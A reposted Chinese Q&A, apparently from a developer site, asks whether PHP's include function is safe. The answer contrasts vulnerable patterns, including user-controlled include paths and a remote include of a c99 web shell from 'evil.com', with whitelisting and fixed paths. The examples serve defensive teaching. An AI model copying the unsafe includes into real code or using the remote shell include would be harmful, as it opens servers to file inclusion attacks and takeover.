PHP – “包含”功能是否安全?

前端之家收集整理的这篇文章主要介绍了PHP – “包含”功能是否安全?前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
我正在使用“include”函数(e.x.“include’head2.PHP’”或“include’class.users.PHP’”)
在我的网站中添加标题或会话类.我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西.
所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求.

提前致谢.

这一切都取决于你如何实现它.如果您专门设置路径,那么它是安全的.如果允许用户输入确定文件路径而不进行清理或检查,则可能发生攻击.

不安全(目录遍历)

<?PHP 
include($_GET['file']);
?>

不安全(URL fopen – 如果启用)

<?PHP 
include('http://evil.com/c99shell.PHP');
?>

不安全

<?PHP 
include('./some_dir/' . $_GET['file']);
?>

部分不安全(* .PHP文件易受攻击)

<?PHP 
include('./some_dir/' . $_GET['file'] . '.PHP');
?>

安全(虽然不确定为什么有人会这样做.)

<?PHP 
$allowed = array(
    'somefile.PHP','someotherfile.PHP'
);

if (in_array(basename($_GET['file']),$allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

安全

<?PHP 
include('./includes/somefile.PHP');
?>

猜你在找的PHP相关文章